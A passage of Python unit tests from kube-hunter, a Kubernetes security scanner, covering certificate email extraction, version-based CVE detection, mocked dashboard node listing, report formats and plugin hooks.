47 | h = AzureSpnHunter(e)
48 | c = h.get_key_container()
49 | assert c == None
50 |
--------------------------------------------------------------------------------
/tests/hunting/test_certificates.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.conf import Config, set_config
3 |
4 | set_config(Config())
5 |
6 | from kube_hunter.core.events.types import Event
7 | from kube_hunter.modules.hunting.certificates import CertificateDiscovery, CertificateEmail
8 | from kube_hunter.core.events.event_handler import handler
9 |
10 |
11 | def test_CertificateDiscovery():
12 | cert = """
13 | -----BEGIN CERTIFICATE-----
14 | MIIDZDCCAkwCCQCAzfCLqrJvuTANBgkqhkiG9w0BAQsFADB0MQswCQYDVQQGEwJV
15 | UzELMAkGA1UECAwCQ0ExEDAOBgNVBAoMB05vZGUuanMxETAPBgNVBAsMCG5vZGUt
16 | Z3lwMRIwEAYDVQQDDAlsb2NhbGhvc3QxHzAdBgkqhkiG9w0BCQEWEGJ1aWxkQG5v
17 | ZGVqcy5vcmcwHhcNMTkwNjIyMDYyMjMzWhcNMjIwNDExMDYyMjMzWjB0MQswCQYD
18 | VQQGEwJVUzELMAkGA1UECAwCQ0ExEDAOBgNVBAoMB05vZGUuanMxETAPBgNVBAsM
19 | CG5vZGUtZ3lwMRIwEAYDVQQDDAlsb2NhbGhvc3QxHzAdBgkqhkiG9w0BCQEWEGJ1
20 | aWxkQG5vZGVqcy5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDS
21 | CHjvtVW4HdbbUwZ/ZV9s6U4x0KSoyNQrsCZjB8kRpFPe50DS5mfmu2SNBGYKRgzk
22 | 4QEEwFB9N2o8YTWsCefSRl6ti4ToPZqulU4hhRKYrEGtMJcRzi3IN7s200JaO3UH
23 | 01Su8ruO0NESb5zEU1Ykfh8Lub8TGEAINmgI61d/5d5Aq3kDjUHQJt1Ekw03Ylnu
24 | juQyCGZxLxnngu0mIvwzyL/UeeUgsfQLzvppUk6In7tC1zzMjSPWo0c8qu6KvrW4
25 | bKYnkZkzdQifzbpO5ERMEsh5HWq0uHa6+dgcVHFvlhdqF4Uat87ygNplVf0txsZB
26 | MNVqbz1k6xkZYMnzDoydAgMBAAEwDQYJKoZIhvcNAQELBQADggEBADspZGtKpWxy
27 | J1W3FA1aeQhMvequQTcMRz4avkm4K4HfTdV1iVD4CbvdezBphouBlyLVLDFJP7RZ
28 | m7dBJVgBwnxufoFLne8cR2MGqDRoySbFT1AtDJdxabE6Fg+QGUpgOQfeBJ6ANlSB
29 | +qJ+HG4QA+Ouh5hxz9mgYwkIsMUABHiwENdZ/kT8Edw4xKgd3uH0YP4iiePMD66c
30 | rzW3uXH5J1jnKgBlpxtog4P6dHCcoq+PZJ17W5bdXNyqC1LPzQqniZ2BNcEZ4ix3
31 | slAZAOWD1zLLGJhBPMV1fa0sHNBWc6oicr3YK/IDb0cp9kiLvnUu1pHy+LWQGqtC
32 | rceJuGsnJEQ=
33 | -----END CERTIFICATE-----
34 | """
35 | c = CertificateDiscovery(Event())
36 | c.examine_certificate(cert)
37 |
38 |
39 | @handler.subscribe(CertificateEmail)
40 | class test_CertificateEmail:
41 | def __init__(self, event):
42 | assert event.email == b"build@nodejs.org0"
43 |
--------------------------------------------------------------------------------
/tests/hunting/test_cvehunting.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import time
3 |
4 | from kube_hunter.conf import Config, set_config
5 |
6 | set_config(Config())
7 |
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import K8sVersionDisclosure
10 | from kube_hunter.modules.hunting.cves import (
11 | K8sClusterCveHunter,
12 | ServerApiVersionEndPointAccessPE,
13 | ServerApiVersionEndPointAccessDos,
14 | CveUtils,
15 | )
16 |
17 | cve_counter = 0
18 |
19 |
20 | def test_K8sCveHunter():
21 | global cve_counter
22 | # because the hunter unregisters itself, we manually remove this option, so we can test it
23 | K8sClusterCveHunter.__new__ = lambda self, cls: object.__new__(self)
24 |
25 | e = K8sVersionDisclosure(version="1.10.1", from_endpoint="/version")
26 | h = K8sClusterCveHunter(e)
27 | h.execute()
28 |
29 | time.sleep(0.01)
30 | assert cve_counter == 2
31 | cve_counter = 0
32 |
33 | # test patched version
34 | e = K8sVersionDisclosure(version="v1.13.6-gke.13", from_endpoint="/version")
35 | h = K8sClusterCveHunter(e)
36 | h.execute()
37 |
38 | time.sleep(0.01)
39 | assert cve_counter == 0
40 | cve_counter = 0
41 |
42 |
43 | @handler.subscribe(ServerApiVersionEndPointAccessPE)
44 | class test_CVE_2018_1002105:
45 | def __init__(self, event):
46 | global cve_counter
47 | cve_counter += 1
48 |
49 |
50 | @handler.subscribe(ServerApiVersionEndPointAccessDos)
51 | class test_CVE_2019_1002100:
52 | def __init__(self, event):
53 | global cve_counter
54 | cve_counter += 1
55 |
56 |
57 | class TestCveUtils:
58 | def test_is_downstream(self):
59 | test_cases = (
60 | ("1", False),
61 | ("1.2", False),
62 | ("1.2-3", True),
63 | ("1.2-r3", True),
64 | ("1.2+3", True),
65 | ("1.2~3", True),
66 | ("1.2+a3f5cb2", True),
67 | ("1.2-9287543", True),
68 | ("v1", False),
69 | ("v1.2", False),
70 | ("v1.2-3", True),
71 | ("v1.2-r3", True),
72 | ("v1.2+3", True),
73 | ("v1.2~3", True),
74 | ("v1.2+a3f5cb2", True),
75 | ("v1.2-9287543", True),
76 | ("v1.13.9-gke.3", True),
77 | )
78 |
79 | for version, expected in test_cases:
80 | actual = CveUtils.is_downstream_version(version)
81 | assert actual == expected
82 |
83 | def test_ignore_downstream(self):
84 | test_cases = (
85 | ("v2.2-abcd", ["v1.1", "v2.3"], False),
86 | ("v2.2-abcd", ["v1.1", "v2.2"], False),
87 | ("v1.13.9-gke.3", ["v1.14.8"], False),
88 | )
89 |
90 | for check_version, fix_versions, expected in test_cases:
91 | actual = CveUtils.is_vulnerable(fix_versions, check_version, True)
92 | assert actual == expected
93 |
--------------------------------------------------------------------------------
/tests/hunting/test_dashboard.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | from types import SimpleNamespace
4 | from requests_mock import Mocker
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.modules.hunting.dashboard import KubeDashboard # noqa: E402
10 |
11 |
12 | class TestKubeDashboard:
13 | @staticmethod
14 | def get_nodes_mock(result: dict, **kwargs):
15 | with Mocker() as m:
16 | m.get("http://mockdashboard:8000/api/v1/node", text=json.dumps(result), **kwargs)
17 | hunter = KubeDashboard(SimpleNamespace(host="mockdashboard", port=8000))
18 | return hunter.get_nodes()
19 |
20 | @staticmethod
21 | def test_get_nodes_with_result():
22 | nodes = {"nodes": [{"objectMeta": {"name": "node1"}}]}
23 | expected = ["node1"]
24 | actual = TestKubeDashboard.get_nodes_mock(nodes)
25 |
26 | assert expected == actual
27 |
28 | @staticmethod
29 | def test_get_nodes_without_result():
30 | nodes = {"nodes": []}
31 | expected = []
32 | actual = TestKubeDashboard.get_nodes_mock(nodes)
33 |
34 | assert expected == actual
35 |
36 | @staticmethod
37 | def test_get_nodes_invalid_result():
38 | expected = None
39 | actual = TestKubeDashboard.get_nodes_mock(dict(), status_code=404)
40 |
41 | assert expected == actual
42 |
--------------------------------------------------------------------------------
/tests/modules/test_reports.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.conf import Config, set_config
3 |
4 | set_config(Config())
5 |
6 | from kube_hunter.modules.report import get_reporter, get_dispatcher
7 | from kube_hunter.modules.report.factory import (
8 | YAMLReporter,
9 | JSONReporter,
10 | PlainReporter,
11 | HTTPDispatcher,
12 | STDOUTDispatcher,
13 | )
14 |
15 |
16 | def test_reporters():
17 | test_cases = [
18 | ("plain", PlainReporter),
19 | ("json", JSONReporter),
20 | ("yaml", YAMLReporter),
21 | ("notexists", PlainReporter),
22 | ]
23 |
24 | for report_type, expected in test_cases:
25 | actual = get_reporter(report_type)
26 | assert type(actual) is expected
27 |
28 |
29 | def test_dispatchers():
30 | test_cases = [
31 | ("stdout", STDOUTDispatcher),
32 | ("http", HTTPDispatcher),
33 | ("notexists", STDOUTDispatcher),
34 | ]
35 |
36 | for dispatcher_type, expected in test_cases:
37 | actual = get_dispatcher(dispatcher_type)
38 | assert type(actual) is expected
39 |
--------------------------------------------------------------------------------
/tests/plugins/test_hooks.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.plugins import hookimpl
2 |
3 | return_string = "return_string"
4 |
5 |
6 | @hookimpl
7 | def parser_add_arguments(parser):
8 | return return_string
9 |
10 |
11 | @hookimpl
12 | def load_plugin(args):
13 | return return_string
14 |
--------------------------------------------------------------------------------
/tests/plugins/test_plugins_hooks.py:
--------------------------------------------------------------------------------
1 | from argparse import ArgumentParser
2 | from tests.plugins import test_hooks
3 | from kube_hunter.plugins import initialize_plugin_manager
4 |
5 |
6 | def test_all_plugin_hooks():
7 | pm = initialize_plugin_manager()
8 | pm.register(test_hooks)
9 |
10 | # Testing parser_add_arguments
11 | parser = ArgumentParser("Test Argument Parser")
12 | results = pm.hook.parser_add_arguments(parser=parser)
13 | assert test_hooks.return_string in results
14 |
15 | # Testing load_plugin
16 | results = pm.hook.load_plugin(args=[])
17 | assert test_hooks.return_string in results
18 |
--------------------------------------------------------------------------------